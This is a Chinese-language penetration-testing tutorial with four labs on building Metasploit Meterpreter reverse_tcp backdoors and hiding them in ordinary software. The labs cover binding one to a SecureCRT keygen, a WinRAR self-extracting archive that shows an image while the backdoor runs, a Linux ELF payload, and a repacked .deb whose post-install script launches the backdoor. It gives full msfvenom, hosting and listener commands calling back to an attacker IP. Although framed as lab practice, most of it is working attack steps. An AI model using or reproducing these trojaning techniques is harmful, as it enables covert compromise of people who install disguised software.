客户端渗透原理
实战——注册机捆绑恶意程序上线MSF
实战
-
安装开发环境
# apt update # apt-get -y install cmake build-essential g++-multilib libcapstone-dev time mingw-w64-tools golang binutils-mingw-w64-x86-64 mingw-w64 -
使用msfvenom生成msf后门程序
# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.141.68 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o msf.exe // -p : payload // LHOST : 监听结果返回(reverse)到的主机 // LPORT : 监听结果返回(reverse)到的主机的端口 -
绑定msf后门程序与原程序(.exe)
# ./binding msf.exe SecureCRT-kg.exe SecureCRT-kg.ico //使用binding来绑定 -
把输出程序部署到apache上,方便下载
# cp output/payload.exe /var/www/html # systemctl start apache2 -
监听msf后门程序
# msfdb run # use exploit/multi/handler # show options # set payload windows/meterpreter/reverse_tcp //设置监听程序的payload与msf后门程序的payload一致 # set lhost 192.168.141.68 //设置监听程序在哪里监听,要与msf后门程序中reverse回的host一致 -
到靶机上排查:
C盘该路径下会生成一个msf.exe文件
总结
-
原理:就是利用捆绑程序binding把一个后门程序和正常程序(.exe)捆绑在一起,生成一个捆绑程序。然后只要把该捆绑程序注入到靶机的该程序的安装目录,然后运行该捆绑程序,就会出现以下效果:
原程序一切运行正常,但同时c盘相应目录下会生成后门程序msf.exe,并且该后门程序会自动运行。
-
健壮性:会被一些杀毒攻击检测到并杀死
-
payload类型: windows/meterpreter/reverse_tcp ,reverse_tcp说明了后门程序运行时靶机 会反过来连接攻击机。
-
局限性:只有在局域网中攻击机才能对靶机成功控制
-
基于内存的: 从电脑管家给出的木马检测报告,可以看出msf后门程序是基于内存的,不写硬盘
实战——WinRAR捆绑恶意程序并自动上线MSF
实战
-
使用msfvenom生成msf后门程序
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.141.68 LPORT=4444 -f exe -o /var/www/html/dongman.exe -
把输出程序部署到apache上,方便下载
# cp output/payload.exe /var/www/html # systemctl start apache2 -
在windows上利用WinRAR来制作自解压捆绑软件
1. 先找一张.jpg图片,再到网站上转换它得到一张.ico图片 2. 利用WinRAR将.jpg图片、后门程序、.ico图片捆绑在一起:实现.ico文件是自解压捆绑软件的logo,并且一点开自解压捆绑软件就将.jpg图片打开,并且后门程序在后台运行 -
监听msf后门程序
# msfdb run # use exploit/multi/handler # show options # set payload windows/meterpreter/reverse_tcp //设置监听程序的payload与msf后门程序的payload一致 # set lhost 192.168.141.68 //设置监听程序在哪里监听,要与msf后门程序中reverse回的host一致 -
双击运行自解压捆绑软件
实战——制作Linux恶意软件获取shell
实战
-
使用msfvenom生成msf后门程序
# msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.141.68 LPORT=4444 -b "\x00" -f elf -o /var/www/html/xuegod // -f elf : linux上的可执行文件格式 -
监听msf后门程序
# msfdb run # use exploit/multi/handler # show options # set payload linux/x64/meterpreter/reverse_tcp //设置监听程序的payload与msf后门程序的payload一致 # set lhost 192.168.141.68 //设置监听程序在哪里监听,要与msf后门程序中reverse回的host一致 -
linux靶机上运行msf后门程序
实战——制作恶意deb软件包来触发后门
实战
解包:
# dpkg -x freesweep_1.0.1-2_amd64.deb free
-
使用msfvenom生成msf后门程序
# msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.141.68 LPORT=4444 -b "\x00" -f elf -o /root/free/usr/games/freesweep_sources //注意 : 生成软件包时无论是payload还是软件包信息都需要选择能够在目标操作系统上可以执行的 -
创建软件包信息
- 想要使软件包安装完成后,自动执行后门文件 ---> 通过编写后脚本文件
// & :表示后台运行
-
打包
# dpkg-deb --build /root/free/